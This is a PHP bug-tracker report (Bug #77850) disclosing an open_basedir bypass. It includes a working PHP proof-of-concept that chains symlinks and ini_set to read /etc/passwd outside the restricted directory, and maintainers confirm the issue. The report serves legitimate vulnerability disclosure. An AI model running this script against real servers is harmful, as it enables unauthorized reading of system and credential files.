php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #77850 Open_basedir bypass
Submitted: 2019-04-05 04:48 UTC Modified: 2019-06-18 05:47 UTC
Votes:6
Avg. Score:3.7 ± 1.5
Reproduced:1 of 2 (50.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: simon dot vikstrom at gmail dot com Assigned:
Status: Verified Package: *Directory/Filesystem functions
PHP Version: 7.3.4 OS: Linux
Private report: No CVE-ID: None
 [2019-04-05 04:48 UTC] simon dot vikstrom at gmail dot com
Description:
------------
Blaklis_ on twitter published a open_basedir bypass :

https://twitter.com/Blaklis_/status/1113866828739166208



Test script:
---------------
<?php

/*

I could recreat with:

mkdir -p /var/www/html
chmod -R YOURUSER:YOURUSER /var/www 
cd /var/www/html/
php  -d open_basedir=/var/www FILENAME.php

*/

mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE);
symlink('/var/www/html/a/b/c/d/e/f/g','foo');
ini_set('open_basedir','/var/www/html:bar/');
symlink('foo/../../../../../../','bar');
unlink('foo');
symlink('/var/www/html/','foo');
echo file_get_contents('bar/etc/passwd');


Expected result:
----------------
file_get_contents(): open_basedir restriction in effect.  ....

Actual result:
--------------
Reads /etc/passwd

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-07 09:48 UTC] sjon@php.net
-Status: Open +Status: Verified
 [2019-05-07 09:48 UTC] sjon@php.net
I can confirm this issue - see https://3v4l.org/75AX0
 [2019-06-18 05:47 UTC] jhdxr@php.net
related discussion: https://externals.io/message/105606
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Oct 16 04:01:27 2024 UTC